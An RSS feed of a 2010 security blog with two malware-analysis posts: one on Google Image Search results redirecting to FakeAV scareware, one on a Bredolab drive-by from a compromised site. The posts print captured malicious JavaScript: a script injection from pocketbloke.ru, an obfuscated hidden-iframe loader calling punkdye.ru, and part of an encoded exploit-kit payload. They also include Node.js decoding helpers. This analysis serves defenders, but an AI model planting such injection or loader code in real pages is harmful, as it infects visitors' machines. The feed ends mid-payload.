<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Trojaned Binaries</title>
	<atom:link href="http://trojanedbinaries.com/blog/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://trojanedbinaries.com/blog</link>
	<description>Its A Cold World, Better Pack Your Own Heat</description>
	<lastBuildDate>Tue, 07 Sep 2010 15:52:02 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Google Image Searches Leading To FakeAV Sites</title>
		<link>http://trojanedbinaries.com/blog/?p=203</link>
		<comments>http://trojanedbinaries.com/blog/?p=203#comments</comments>
		<pubDate>Fri, 03 Sep 2010 22:59:32 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[IDS]]></category>
		<category><![CDATA[fakeav gis google image search fake antivirus]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=203</guid>
		<description><![CDATA[<p>We have seen several pages created on extremely cheap name registrar/hosting services (the likes of co.cc and cz.cc primarily) that have images of specific things along with lots of related text about that specific image surrounding it in order to increase it within the Google Images search rankings. While this in and of itself is [...]]]></description>
			<content:encoded><![CDATA[<p>We have seen several pages hosted on extremely cheap name registrar/hosting services (primarily <a href="http://co.cc">co.cc</a> and <a href="http://cz.cc">cz.cc</a>) that carry images of specific subjects surrounded by lots of related text, so that they rank well in Google Images for those subjects. This in and of itself is nothing new (people have been doing it since the dawn of search engines to drive hits), but the fact that a user can keep their browser on <a href="http://www.google.com">www.google.com</a> and still load content from a FakeAV or drive-by exploit kit is a bit of a game changer. It gives attackers a very cheap way to drive traffic to their exploit kits without having to compromise massive numbers of WordPress blogs, run or defraud advertising networks, or send tons of email spam. Below we walk through one of the examples identified in the wild.</p>
<p>The URL we stumbled upon during research was the following (yes, this is real and was live at the time of writing):</p>
<pre>http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&amp;imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&amp;usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&amp;h=370&amp;w=441&amp;sz=158&amp;hl=en&amp;start=8&amp;zoom=1&amp;um=1&amp;itbs=1&amp;tbnid=ut-iq_wdKMHNqM:&amp;tbnh=107&amp;tbnw=127&amp;prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1</pre>
<p>If we break this URL down, it has three distinct components:</p>
<pre>www.google.com/imgres?imgurl= - Just good old Google Images
http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg - Location of an image file on the Internet. Nothing special about this either.
http://dzr4n.com/_vti_tmp/john-drake.html - The imgrefurl, i.e. the page Google believes hosts the image. It redirects users to a FakeAV scanner page if and only if the request carries a Referer from Google Images.</pre>
<p>If we load this URL, this is what it looks like in Firefox with NoScript and Firebug running for a little analysis:</p>
<p style="PADDING-LEFT: 30px"><img class="aligncenter size-full wp-image-204" title="gis-fakeav" src="http://trojanedbinaries.com/blog/wp-content/uploads/2010/09/gis-fakeav.jpg" alt="gis-fakeav" width="1082" height="848" /></p>
<p>Notice that the user is still just using Google Image Search, but <a href="http://www.google.com">www.google.com</a> is now loading the content of that website inside an IFRAME, shown in the code snippet below:</p>
<pre id="line1">&lt;div id=il_fc&gt;&lt;iframe src="http://dzr4n.com/_vti_tmp/john-drake.html" id=il_f frameborder=0 scrolling="no"&gt;&lt;/iframe&gt;</pre>
<p>When we request that page with the Referer shown below, the malicious server answers with a redirect that ultimately leads to the FakeAV site. If you go there directly (without a Google Images Referer) you instead see a garbage blog page with the picture (and several others taken from other sites) surrounded by lots of tags and keywords related to various people named John Drake. Below is the request generated by loading the above IFRAME, followed by the 302 redirect it receives:</p>
<pre>GET /_vti_tmp/john-drake.html HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&amp;imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&amp;usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&amp;h=370&amp;w=441&amp;sz=158&amp;hl=en&amp;start=8&amp;zoom=1&amp;um=1&amp;itbs=1&amp;tbnid=ut-iq_wdKMHNqM:&amp;tbnh=107&amp;tbnw=127&amp;prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dzr4n.com
Connection: Keep-Alive </pre>
<pre>HTTP/1.1 302 Moved Temporarily
Date: Fri, 03 Sep 2010 22:34:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Location: http://dwedwedwed.co.cc/?777
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html</pre>
<p>Notice that it redirects to a domain we haven&#8217;t seen yet in the discussion, dwedwedwed.co.cc/?777. There are intermediary servers in the chain before the client using Google Images finally lands on the FakeAV site at froltartemo.cz.cc; the steps taken to get to the FakeAV site are shown below:</p>
<pre>GET /?777 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&amp;imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&amp;usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&amp;h=370&amp;w=441&amp;sz=158&amp;hl=en&amp;start=8&amp;zoom=1&amp;um=1&amp;itbs=1&amp;tbnid=ut-iq_wdKMHNqM:&amp;tbnh=107&amp;tbnw=127&amp;prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: dwedwedwed.co.cc</pre>
<pre>HTTP/1.1 302 Found
Date: Fri, 03 Sep 2010 22:38:10 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Fri, 03 Sep 2010 22:38:10 GMT
Cache-Control: max-age=0
Pragma: no-cache
Set-Cookie: sid=1S2; expires=Sun, 05-Sep-2010 00:33:45 GMT; path=/
LOCATION: http://dwedwedwed.co.cc/t/bak.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html; charset=utf-8</pre>
<pre>....................</pre>
<p>This causes the next request and response:</p>
<pre>GET /t/bak.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&amp;imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&amp;usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&amp;h=370&amp;w=441&amp;sz=158&amp;hl=en&amp;start=8&amp;zoom=1&amp;um=1&amp;itbs=1&amp;tbnid=ut-iq_wdKMHNqM:&amp;tbnh=107&amp;tbnw=127&amp;prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: dwedwedwed.co.cc</pre>
<pre>HTTP/1.1 200 OK
Date: Fri, 03 Sep 2010 22:38:11 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 243
Connection: close
Content-Type: text/html; charset=utf-8</pre>
<pre>&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;404 Not Found&lt;/title&gt;
&lt;/head&gt;
&lt;script language="JavaScript" type="text/javascript"&gt;
if (top.location != self.location) top.location = self.location;
&lt;/script&gt;
&lt;body&gt;
&lt;script&gt;window.location="http://froltartemo.cz.cc/scanner15/?afid=60";&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
<p>The page above is deliberately titled 404 Not Found, but it is served with a 200 and its body does two things: a frame-busting snippet (top.location = self.location) breaks the page out of Google&#8217;s IFRAME into the top-level window, and a JavaScript redirect then finally sends the client to the FakeAV page. When that loads, the browser is resized and hidden behind a prompt box in an attempt to trick the user into downloading and executing a binary:</p>
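<p>As an added example (not code from the original post), here is a small Node.js script that reconstructs the redirect chain above from captured responses, the way you would when working from a proxy log or pcap instead of a live browser. The three responses are trimmed copies of the ones shown above, embedded as constants. The hop resolver accepts a 3xx Location header regardless of case (the second hop spells it LOCATION), a JavaScript location assignment in a 200 body, or a meta refresh; it ignores the frame-busting top.location = self.location line because that assigns no literal URL.</p>

```javascript
// Added example, not part of the original post: walk a FakeAV redirect chain from captured responses.

// Split a raw HTTP response into status code, lower-cased headers and body.
function parseResponse(raw) {
  const sepIndex = raw.search(/\r?\n\r?\n/);
  const head = sepIndex < 0 ? raw : raw.slice(0, sepIndex);
  const body = sepIndex < 0 ? '' : raw.slice(sepIndex).replace(/^\r?\n\r?\n/, '');
  const lines = head.split(/\r?\n/);
  const status = parseInt(lines[0].split(' ')[1], 10);
  const headers = {};
  for (const line of lines.slice(1)) {
    const colon = line.indexOf(':');
    // Header names are case-insensitive; the second hop in the post sends "LOCATION:".
    if (colon > 0) headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return { status, headers, body };
}

// Work out where one response sends the browser next, or null if it is a terminal page.
function nextHop(raw, currentUrl) {
  const r = parseResponse(raw);
  if (r.status >= 300 && r.status < 400 && r.headers.location) {
    return { url: new URL(r.headers.location, currentUrl).href, via: 'HTTP ' + r.status + ' Location' };
  }
  // Only a quoted literal URL counts; "top.location = self.location" (the frame-buster) is not a hop.
  const js = r.body.match(/(?:window|document|top|self)\.location(?:\.href)?\s*=\s*["']([^"']+)["']/);
  if (js) return { url: new URL(js[1], currentUrl).href, via: 'JavaScript location assignment' };
  const meta = r.body.match(/<meta[^>]*http-equiv=["']?refresh["']?[^>]*url=([^"'>\s]+)/i);
  if (meta) return { url: new URL(meta[1], currentUrl).href, via: 'meta refresh' };
  return null;
}

// Follow hops through a map of URL -> captured response until the chain ends or the capture runs out.
function followChain(startUrl, captured, maxHops = 10) {
  const chain = [{ url: startUrl, via: 'start' }];
  let url = startUrl;
  while (chain.length <= maxHops && captured[url]) {
    const hop = nextHop(captured[url], url);
    if (!hop) break;
    chain.push(hop);
    url = hop.url;
  }
  return chain;
}

// Captured responses from the post, trimmed to the headers and body that matter for the chain.
const CAPTURED = {
  'http://dzr4n.com/_vti_tmp/john-drake.html':
    'HTTP/1.1 302 Moved Temporarily\r\nLocation: http://dwedwedwed.co.cc/?777\r\nContent-Length: 0\r\n\r\n',
  'http://dwedwedwed.co.cc/?777':
    'HTTP/1.1 302 Found\r\nLOCATION: http://dwedwedwed.co.cc/t/bak.php\r\nContent-Type: text/html; charset=utf-8\r\n\r\n',
  'http://dwedwedwed.co.cc/t/bak.php':
    'HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n' +
    '<html><head><title>404 Not Found</title></head>' +
    '<script>if (top.location != self.location) top.location = self.location;</script>' +
    '<body><script>window.location="http://froltartemo.cz.cc/scanner15/?afid=60";</script></body></html>',
};

// Convenience: just the URLs of the chain, starting from the page Google framed.
function chainUrls(startUrl) {
  return followChain(startUrl, CAPTURED).map((hop) => hop.url);
}

// Starting at the framed page yields four URLs, ending at the FakeAV scanner page.
console.log(chainUrls('http://dzr4n.com/_vti_tmp/john-drake.html'));
```

<p>The map of URL to response is the only thing tied to this capture; feeding it the responses from a different chain (or a live fetch that preserves the Google Referer, since the first hop only redirects when it sees one) reuses everything else.</p>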
<p style="PADDING-LEFT: 30px"><img class="aligncenter size-full wp-image-204" title="fakeav" src="http://trojanedbinaries.com/blog/wp-content/uploads/2010/09/fakeav.jpg" alt="fakeav" /></p>
<p>From there on out, it is mostly down to how good your antivirus solution is at detecting this stuff and how willing the user is to run an executable they think they just downloaded from Google.</p>
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=203</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bredolab Infections And The Compromised Sites That Redirect Clients To The Drive Bys</title>
		<link>http://trojanedbinaries.com/blog/?p=188</link>
		<comments>http://trojanedbinaries.com/blog/?p=188#comments</comments>
		<pubDate>Fri, 13 Aug 2010 23:14:59 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[IDS]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=188</guid>
		<description><![CDATA[<p>The Bredolab infections we commonly see use compromised websites to redirect clients going to legitimate websites. This is in contrast to the SEO exploit sites that rely almost exclusively on malvertising for driving people to them. The amount of people driven to the bredolab boxes are not nearly as high as you might imagine [...]]]></description>
			<content:encoded><![CDATA[<p>The Bredolab infections we commonly see use compromised websites to redirect clients who are visiting legitimate sites. This is in contrast to the SEO exploit sites, which rely almost exclusively on malvertising to drive people to them. The number of people driven to the Bredolab boxes is not nearly as high as you might imagine, and they really aren&#8217;t any more difficult to track. Below we go step by step through a client visiting a website until it becomes infected. Here is the first request we take note of: the user searched for a term in Google and clicked a result hosted on www.iwatchdocumentaries.com:</p>
<pre style="PADDING-LEFT: 30px">GET /documenatries/louis-theroux-americas-medicated-kids-2010/ HTTP/1.1
Accept: */*
Referer: http://www.google.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.iwatchdocumentaries.com
Connection: Keep-Alive</pre>
<p>The response to this request is quite lengthy, so we trim it down and focus on a JavaScript file that is pulled in from a streaming media provider&#8217;s site:</p>
<pre style="PADDING-LEFT: 30px">HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 28978
Content-Type: text/html
Date: Fri, 13 Aug 2010 &lt;OMITTED&gt;
Keep-Alive: timeout=15, max=1000
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Set-Cookie: vid_count_&lt;OMITTED&gt;=&lt;OMITTED&gt;; expires=Sat, 13-Aug-2011 &lt;OMITTED&gt;
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9</pre>
<pre style="PADDING-LEFT: 30px">&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;
&lt;title&gt;Watch "Louis Theroux: America's Medicated Kids" (2010) Free - Watch Documentaries Online&lt;/title&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;
&lt;meta name="description" content="Watch Louis Theroux: America's Medicated Kids 2010 Online for free. Louis Theroux: America's Medicated Kids Summary: Faced with the challenging behaviour of their kids more and more parents in America are turning to psychoactive medication to help them cope even though the drugs and sometimes the diagnoses remain controversial. Louis travels to one of Americas leading childrens psychiatric treatment centres in Pit..." /&gt;
&lt;meta name="keywords" content="Watch Louis Theroux: America's Medicated Kids Online, Watch Louis Theroux: America's Medicated Kids 2010, Watch Documentaries Free, Watch Documentaries Online" /&gt;
&lt;link rel="icon" type="image/x-icon" href="http://deliver.theiwatchnetwork.com/5/images-css/browser.ico" /&gt;
&lt;link rel="stylesheet" type="text/css" href="http://deliver.theiwatchnetwork.com/5/iwatch_06.css" media="screen" /&gt;
&lt;script type="text/javascript" src="<span style="color: #ff0000;">http://deliver.theiwatchnetwork.com/5/iwatch_05.js</span>"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;
window.onload=function(){ update_link_ratings() }
function update_link_ratings() {
document.getElementById('s201366494').innerHTML = '&lt;font color="#009900"&gt;100%&lt;/font&gt;';
}
&lt;/script&gt;
---TONS OF STUFF OMITTED FOR THE SAKE OF BREVITY---
&lt;/body&gt;
&lt;/html&gt;</pre>
<p>What causes the client to end up requesting the drive-by is the content of the http://deliver.theiwatchnetwork.com/5/iwatch_05.js JavaScript file. Right at the end of that file, after a lot of legitimate-looking code, is the following document.write:</p>
<pre style="PADDING-LEFT: 30px">HTTP/1.1 200 OK
Cache-Control: max-age=6048000
Connection: keep-alive
Content-Length: 156825
Content-Type: application/x-javascript
Date: Fri, 13 Aug 2010 &lt;REMOVED&gt;
ETag: &lt;REMOVED&gt;
Expires: Fri, 22 Oct 2010 &lt;REMOVED&gt;
Last-Modified: Thu, 12 Aug 2010 &lt;REMOVED&gt;
Server: CacheFlyServe v26b
X-CF1: fC.ord1:hf</pre>
<pre style="PADDING-LEFT: 30px">---TONS OF STUFF OMITTED FOR THE SAKE OF BREVITY---
document.write('&lt;sc'+'ript type="text/javascript" src="<span style="color: #ff0000;">http://pocketbloke.ru/Facebook.js</span>"&gt;&lt;/scri'+'pt&gt;');</pre>
<p>This of course causes the client to request http://pocketbloke.ru/Facebook.js. Here is the server&#8217;s response to that request, in its entirety:</p>
<pre style="PADDING-LEFT: 30px">HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 &lt;REMOVED&gt;
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 1256</pre>
<pre style="PADDING-LEFT: 30px">try{
var U3uj00dp58;
function Xgdvqin(){
if (typeof(document.body) == 'object'){
clearInterval(U3uj00dp58);
}else{
return true;
}
Ek09wc1guj = '';
Rlg92ocpa = ['src','h&gt;e&gt;ingnh&gt;tv'.replace(/[vn,4\&gt;]/g, ''), 'wzi#dpt#hM'.replace(/[M#z\!p]/g, '')];
function Gp3paj1lm(Eta8efwl037,Vmmu4gc2m,Imzsoblt938q4f){
return Eta8efwl037.setAttribute(Vmmu4gc2m,Imzsoblt938q4f);
}
function Yjcsup30i4t(Idfrg0lo9s){
return document.createElement(Idfrg0lo9s);
}
Elakx6em19 = 'p';
Xf2wek912 = window.frames.length;
if (Xf2wek912&lt;20) Elakx6em19 = '<span style="color: #ff0000;">i</span>5<span style="color: #ff0000;">f</span>4<span style="color: #ff0000;">r</span>5<span style="color: #ff0000;">a</span>n<span style="color: #ff0000;">m</span>4<span style="color: #ff0000;">e</span>&lt;'.replace(/[\&lt;5\]4n]/g, '');
Egi14av = 'US';
Vt5pcf3zu80 = '2679997376';
Oskptba3 = '<span style="color: #ff0000;">http://punkdye.ru:8080/index.php?pid=1&amp;Cxuuxx0tgpkezo09=</span>'+Xf2wek912;
Nnkuah4e4bj4 = 1060243405;
Ki6v57vs = Yjcsup30i4t('div');
Ki6v57vs.id = 'Ai6lruxkgj';
Ki6v57vs.name = 'Ai6lruxkgj';
Nnkuah4e4bj4 -= 530121702.5*2;
document.body.appendChild(Ki6v57vs);
H9cgm6y3fl = 'Nnkuah4e4bj4';
L2h514hotu = new Array(Oskptba3, Nnkuah4e4bj4,Nnkuah4e4bj4);
Cgnjln5alh = document.createElement(Elakx6em19);
for (Eizoi0xp in Rlg92ocpa){
Gp3paj1lm(Cgnjln5alh,Rlg92ocpa[Eizoi0xp], L2h514hotu[Eizoi0xp]);
}
document.getElementById('Ai6lruxkgj').appendChild(Cgnjln5alh);
}
U3uj00dp58 = window.setInterval(Xgdvqin, '300');
}catch(Ekdyic4zi9u){}</pre>
<p>We could fully deobfuscate this, but we don&#8217;t really have to. The padded strings decode with their own replace() calls: Rlg92ocpa becomes ['src', 'height', 'width'] and Elakx6em19 becomes 'iframe' (unless the page already holds 20 or more frames, in which case a harmless p element is created instead), and the arithmetic on Nnkuah4e4bj4 simply evaluates to 0. So this JavaScript polls every 300 ms until document.body exists and then appends a 0 by 0 IFRAME pointing at punkdye.ru on port 8080, with window.frames.length tacked onto the URL, which is more than a little suspicious. And of course, the client then makes this request next:</p>
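<p>As an added example (not code from the original post), the following Node.js snippet re-evaluates the loader&#8217;s string tricks statically, with the literals copied from the capture above, which is usually safer and quicker than stepping through it in a browser. frameCount is a stand-in for window.frames.length, which the real script reads from the victim page. Two details it makes explicit: the IFRAME is 0 by 0 pixels, and a page that already contains 20 or more frames gets a harmless p element instead.</p>

```javascript
// Added example, not part of the original post: statically re-evaluate the pocketbloke.ru loader.

// The loader hides keywords by padding them with junk characters and stripping the junk with a
// character-class replace; this is exactly that operation, applied to its literals without running it.
function stripNoise(padded, noiseChars) {
  return padded.replace(noiseChars, '');
}

// Reproduce what Xgdvqin() builds once document.body exists. frameCount stands in for
// window.frames.length, which the script reads from the victim page and appends to the URL.
function buildInjectedElement(frameCount) {
  // Rlg92ocpa: the attribute names, with the regexes copied from the capture
  const attrNames = [
    'src',
    stripNoise('h>e>ingnh>tv', /[vn,4\>]/g),
    stripNoise('wzi#dpt#hM', /[M#z\!p]/g),
  ];
  // Elakx6em19: element type; a page already holding 20 or more frames gets a harmless <p>
  let tag = 'p';
  if (frameCount < 20) tag = stripNoise('i5f4r5anm4e<', /[\<5\]4n]/g);
  // Oskptba3: landing page URL with the frame count appended (the capture shows "=0")
  const src = 'http://punkdye.ru:8080/index.php?pid=1&Cxuuxx0tgpkezo09=' + frameCount;
  // Nnkuah4e4bj4: arithmetic noise that evaluates to 0, used for both height and width
  let size = 1060243405;
  size -= 530121702.5 * 2;
  const values = [src, size, size];
  const attrs = {};
  attrNames.forEach((name, i) => { attrs[name] = values[i]; });
  return { tag, attrs };
}

// With no frames on the page: { tag: 'iframe', attrs: { src: 'http://punkdye.ru:8080/index.php?pid=1&Cxuuxx0tgpkezo09=0', height: 0, width: 0 } }
console.log(buildInjectedElement(0));
```

<p>The same stripNoise() helper covers the other replace() idioms in this kit, for example the 'u(n.d.e%f.isn#e(d(' literal in the landing page further down decodes to the string undefined.</p>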
<pre style="PADDING-LEFT: 30px">GET /index.php?pid=1&amp;Cxuuxx0tgpkezo09=0 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.iwatchdocumentaries.com/documenatries/louis-theroux-americas-medicated-kids-2010/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: punkdye.ru:8080
Connection: Keep-Alive</pre>
<p>This gives us the following response from the server: obfuscated data plus the JavaScript landing page of this drive-by kit (whose name I am unsure of). This response can be signatured on with great accuracy using the hidden-visibility div tag. Note that the body is chunked: the e95 before the html tag is the first chunk size and the lone 0 after the closing html tag is the terminating chunk, so those values are transfer framing rather than part of the page:</p>
<pre style="PADDING-LEFT: 30px">HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 &lt;REMOVED&gt;
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Set-Cookie: pid=1; expires=Fri, 13-Aug-2010 &lt;REMOVED&gt;</pre>
<pre style="PADDING-LEFT: 30px">e95
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Xrgea3q5co5j0&lt;/title&gt;&lt;/head&gt;&lt;body&gt;</pre>
<pre style="PADDING-LEFT: 30px"><span style="color: #000000;">&lt;div style="visibility: hidden;"&gt;&lt;div name="</span>Maz84dbeq" id="Maz84dbeq"&gt;102Q99Q37Q37Q97Q108Q96Q114Q106Q98Q107Q113Q43Q94Q105Q105Q38Q35Q35Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q83Q98Q111Q112Q102Q108Q107Q43Q102Q107Q97Q98Q117Q76Q99Q37Q36Q74Q80Q70Q66Q29Q52Q43Q36Q38Q30Q58Q42Q46Q38Q38Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q116Q111Q102Q113Q98Q37Q31Q57Q102Q99Q111Q94Q106Q98Q29Q112Q111Q96Q58Q89Q31Q101Q96Q109Q55Q44Q44Q112Q98Q111Q115Q102Q96Q98Q112Q44Q112Q98Q94Q111Q96Q101Q60Q110Q114Q98Q111Q118Q58Q35Q113Q108Q109Q102Q96Q58Q101Q96Q109Q55Q44Q44Q112Q118Q112Q113Q98Q106Q44Q112Q118Q112Q102Q107Q99Q108Q44Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q&lt;/div&gt;
